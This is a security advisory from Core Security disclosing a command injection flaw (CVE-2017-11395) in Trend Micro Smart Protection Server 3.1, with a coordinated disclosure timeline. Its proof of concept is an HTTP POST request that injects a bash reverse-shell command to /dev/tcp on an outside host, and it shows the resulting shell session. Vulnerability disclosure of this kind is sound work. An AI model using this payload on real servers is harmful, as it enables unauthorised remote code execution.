Trend Micro Smart Protection OS Command Injection

1. Advisory Information

Title: Trend Micro Smart Protection OS Command Injection
Advisory ID: CORE-2017-0004
Advisory URL: http://www.coresecurity.com/core-labs/advisories/trend-micro-smart-protection-os-command-injection
Date published: 2017-08-23
Date of last update: 2017-08-23
Vendors contacted: Trend Micro
Release mode: Coordinated release

2. Vulnerability Information

Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-11395

3. Vulnerability Description

Trend Micro's website states that:

Trend Micro Smart Protection Server [1] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and web reputation technology to detect security risks. The technology works by off loading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server.

A command injection vulnerability was found in the Smart Protection Server Administration UI. In particular, the cm_agent.php script did not sanitize input parameters before executing a system command.

4. Vulnerable Packages

Trend Micro Smart Protection Server 3.1 (Critical Patch - Build 1030 applied)

Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

Trend Micro published the following Security Notes:

https://success.trendmicro.com/solution/en-US/1117933.aspx

6. Credits

This vulnerability was discovered and researched by Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.

7. Technical Description / Proof of Concept Code

[CVE-2017-11395] The vulnerable function is SOSubscription, which is located in the /var/www/AdminUI/php/cm_agent.php script. This functionality can be reached only by authenticated users, so the attacker would first need to obtain a valid session via some other means (such as XSS).

As can be seen below, the $serviceurl and $apikey variables are read from the $data['Settings'] array and passed to the exec function.

 function SOSubscription($data) { $res = Array('errcode'=>'423','response'=>'ERR','message'=>''); 
$res['success_ok'] = '0'; //auto-deploy information from TMCM $serviceurl = $data['Settings']
['SO_SubscriptionSetting']['ServiceURL']; $apikey = $data['Settings']['SO_SubscriptionSetting']
['APIKey']; if(!$serviceurl || !apikey) { echo json_encode($res); return; } // ccca register command 
$tmpdata = array(); $ret = 0; $reg_cmd = LWCSCTRL_CMD." -c CCCA_REGISTER -u ".$serviceurl." -a 
".$apikey; exec($reg_cmd, $tmpdata, $ret); [...]

Reading through the script a bit more shows that the array is built taking user input from the POST request without sanitizing it.

 if (isset($argv)){ [...] } else{ // remote access need to check session require_once
('inc/ajax_authsession.php'); SessionChecker::CheckAndRedirect(); $type = $_POST['T']; 
$postJsondata = $_POST['data']; #$filename="/var/tmcss/debuglogs/wsi_debug_T".$_POST['T'].
".txt"; #file_put_contents($filename, $_POST['data']); } $postdata = json_decode($postJsondata, 
true); // type must exist if (strlen($type) == 0) { OutputError(ERR_TYPE_NOT_EXIST); return; } 
if (!is_numeric($type)) $type = -1; switch ($type) { [...] case TYPE_SO_SUBSCRIPTION: 
SOSubscription($postdata); break; default: OutputError(ERR_TYPE_INVALID); break; }

The following proof of concept injects a command in the ServiceUrl POST parameter and opens a reverse shell to 192.168.0.4:4567.

 POST /php/cm_agent.php HTTP/1.1 Host: 192.168.32.132:4343 User-Agent: Mozilla/5.0 
(Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,
application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: 
0913293ac171fc7c=qdi24p124q7p5n9mg34ej2sq66; Connection: close Upgrade-Insecure-Requests: 1 
Content-Type: application/x-www-form-urlencoded Content-Length: 156 sid=0913293ac171fc7c&T=
105&data={"Settings":{"SO_SubscriptionSetting":{"ServiceURL":"%3bbash+-i+>%26+/dev/tcp/192.
168.0.4/4567+0>%261%3b", "APIKey":"123"}}} caja:~ maxi$ nc -lv 4567 bash: no job control in 
this shell bash-3.2$ id uid=501(webserv) gid=501(webserv) groups=101(icrc),501(webserv)

8. Report Timeline

2017-05-23: Core Security sent an initial notification to Trend Micro, including a draft advisory.
2017-05-23: Trend Micro confirmed reception of advisory and informed they will submit it to the relevant technical team for validation and replication.
2017-06-07: Core Security asked for an update on the vulnerability reported.
2017-06-07: Trend Micro answered saying due to the imminent release of Smart Protection Server 3.2, it is uncertain if this vulnerability will be addressed on v3.2 or a separate patch.
2017-06-12: Core Security replied asking for a more concrete schedule to fix this vulnerability (still not clear after three weeks after it being reported).
2017-06-14: Trend Micro answered saying the vulnerability has been confirmed and a hotfix should be available within the week. However, no ETA about availability for public download yet. It will be released as a critical patch.
2017-06-19: Core Security acknowledged the information and thanked for the update.
2017-06-23: Trend Micro reported they are in the process of creating the official critical patch and that they will let us know once the official release date is defined.
2017-06-27: Core Security acknowledged the information and thanked for the update.
2017-08-09: Trend Micro reported they already have the patch for the reported vulnerability. They'd like to discuss coordinated disclosure of the advisory (proposed Wednesday 16th). Trend Micro also provided CVE-ID for this vulnerability.
2017-08-10: Core Security thanked for the update and proposed tentative publication date to be Wednesday 23rd, although internal review is needed.
2017-08-16: Core Security confirmed Wednesday 23th as the coordinated release date and also asked for the official download link to include in the advisory.
2017-08-16: Trend Micro sent us their advisory link to be included in our advisory.
2017-08-23: Advisory CORE-2017-0004 published.

9. References

[1] https://www.trendmicro.com/en_ca/business/technologies/smart-protection-network.html

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs

11. About Core Security

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia.

12. Disclaimer

The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/